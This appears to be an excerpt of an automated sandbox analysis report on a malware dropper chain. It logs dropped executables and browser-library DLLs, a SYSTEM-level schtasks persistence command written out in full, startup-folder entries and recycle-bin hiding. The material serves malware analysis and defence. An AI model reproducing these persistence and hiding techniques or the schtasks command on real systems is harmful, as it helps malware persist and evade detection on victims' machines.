Source: C:\Users\user\AppData\Local\Temp\u2xs.0.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\msvcp140[1].dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\i1.exe	File created: C:\Users\user\AppData\Local\Temp\u2xs.2\run.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\i1.exe	File created: C:\Users\user\AppData\Local\Temp\u2xs.3.exe	Jump to dropped file
Source: C:\Windows\System32\svchost.exe	File created: C:\Users\user\AppData\Local\Temp\iolo\dm\BIT157D.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\u2xs.0.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\softokn3[1].dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\u2xs.0.exe	File created: C:\ProgramData\vcruntime140.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\u2xs.0.exe	File created: C:\ProgramData\softokn3.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\u2xs.0.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\vcruntime140[1].dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\u2xs.0.exe	File created: C:\ProgramData\nss3.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\u2xs.2\run.exe	File created: C:\Users\user\AppData\Roaming\SecureClient\relay.dll	Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Local\Temp\i1.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\u2xs.0.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\tiktok[1].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\u2xs.0.exe	File created: C:\ProgramData\freebl3.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\u2xs.2\run.exe	File created: C:\Users\user\AppData\Roaming\SecureClient\UIxMarketPlugin.dll	Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Local\Temp\i3.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\7zS5A79.tmp\Install.exe	File created: C:\Windows\Temp\nlcUipsDcFbdntMB\LDIxkfUBXQlUStg\bMpBlNc.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\u2xs.0.exe	File created: C:\Users\user\AppData\Local\Temp\EHJDHJKFIE.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\7zS5A79.tmp\Install.exe	File created: C:\Windows\Temp\nlcUipsDcFbdntMB\LDIxkfUBXQlUStg\SGcrFlL.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\i3.exe	File created: C:\Users\user\AppData\Local\Temp\7zS5A79.tmp\Install.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\i1.exe	File created: C:\Users\user\AppData\Local\Temp\u2xs.2\UIxMarketPlugin.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\u2xs.0.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\mozglue[1].dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\i1.exe	File created: C:\Users\user\AppData\Local\Temp\u2xs.0.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\i3.exe	File created: C:\Users\user\AppData\Local\Temp\7zS5A79.tmp\ApproveChildRequest.exe	Jump to dropped file

Source: C:\Users\user\AppData\Local\Temp\u2xs.0.exe	File created: C:\ProgramData\mozglue.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\u2xs.0.exe	File created: C:\ProgramData\nss3.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\u2xs.0.exe	File created: C:\ProgramData\msvcp140.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\u2xs.0.exe	File created: C:\ProgramData\freebl3.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\u2xs.0.exe	File created: C:\ProgramData\vcruntime140.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\u2xs.0.exe	File created: C:\ProgramData\softokn3.dll	Jump to dropped file

Source: C:\Users\user\AppData\Local\Temp\7zS5A79.tmp\Install.exe	File created: C:\Windows\Temp\nlcUipsDcFbdntMB\LDIxkfUBXQlUStg\bMpBlNc.exe			Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\7zS5A79.tmp\Install.exe	File created: C:\Windows\Temp\nlcUipsDcFbdntMB\LDIxkfUBXQlUStg\SGcrFlL.exe			Jump to dropped file

Source: C:\Windows\SysWOW64\cmd.exe

File created: C:\Users\user\AppData\Local\Temp\wygmbcpqogng

Jump to dropped file

Boot Survival

Uses schtasks.exe or at.exe to add and modify task schedules

Source: C:\Users\user\AppData\Local\Temp\7zS5A79.tmp\Install.exe

Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /CREATE /TN "biPxHmULFllsbMgnpt" /SC once /ST 17:12:00 /RU "SYSTEM" /TR "\"C:\Users\user\AppData\Local\Temp\7zS5A79.tmp\Install.exe\" Wt /gCsdidCeBm 385128 /S" /V1 /F

Source: C:\Windows\System32\svchost.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\BITA80.tmp

Source: C:\Windows\SysWOW64\schtasks.exe

File created: C:\Windows\Tasks\biPxHmULFllsbMgnpt.job

Source: C:\Users\user\AppData\Local\Temp\u2xs.3.exe

Registry key created: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\iolo Applications

Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnk
Source: C:\Windows\System32\svchost.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\BITA80.tmp

Hooking and other Techniques for Hiding and Protection

Creates files in the recycle bin to hide itself

Source: C:\Users\user\AppData\Local\Temp\7zS5A79.tmp\Install.exe

File created: C:\$RECYCLE.BIN\S-1-5-18

Found hidden mapped module (file has been removed from disk)

Source: C:\Windows\SysWOW64\cmd.exe

Module Loaded: C:\USERS\user\APPDATA\LOCAL\TEMP\WYGMBCPQOGNG

Source: C:\Users\user\AppData\Local\Temp\i1.exe

Code function: 6_2_00408761 GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

6_2_00408761

Source: C:\Users\user\Desktop\file.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate			Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot			Jump to behavior

Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
